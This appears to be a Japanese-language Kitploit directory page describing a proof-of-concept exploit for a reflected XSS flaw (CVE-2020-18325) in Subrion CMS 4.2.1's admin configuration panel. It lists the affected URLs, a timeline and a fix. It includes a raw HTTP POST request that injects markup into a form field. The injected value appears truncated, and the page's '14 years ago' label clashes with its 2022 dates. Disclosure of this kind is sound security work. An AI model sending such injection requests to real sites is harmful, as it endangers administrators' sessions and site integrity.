Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-18325 — Subrion CMS v4.2.1設定パネルの反射型XSS脆弱性の概念実証エクスプロイト。POSTリクエストを介したJavaScriptインジェクションを示します。 | Kitploit
ツール/GitHubGitHub/hamm0nz/cve-2020-18325
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Subrion CMS v4.2.1設定パネルの反射型XSS脆弱性の概念実証エクスプロイト。POSTリクエストを介したJavaScriptインジェクションを示します。

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Intelliants Subrion CMS v4.2.1の設定パネルに複数のクロスサイトスクリプティング(XSS)脆弱性が存在します。

説明

Subrion CMSはインストールが簡単で管理もシンプルです。単独のアプリケーションとして、または他のアプリケーションと組み合わせて、エントリーレベルのサイト、中規模サイト、大規模サイトを作成するために使用できます。

Subrion CMS v.4.2.1の設定パネルに複数の反射型クロスサイトスクリプティング脆弱性が発見され、リモート攻撃者が任意のJavaScriptを注入できる可能性があります。

日付: 27-02-2022
ソフトウェアリンク: https://subrion.org
エクスプロイト作成者: HaMM0nz
CVE: CVE-2020-18325
カテゴリ: Webアプリケーション
影響を受けるURL

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

概念実証

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

タイムライン

発見および報告: 24 June 2019
CVE ID割り当て: 11 Aug 2021
公開: 27 February 2022

解決策

OWASPのXSS防止ガイドラインに従うことを検討してください。(https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

ツールをダウンロード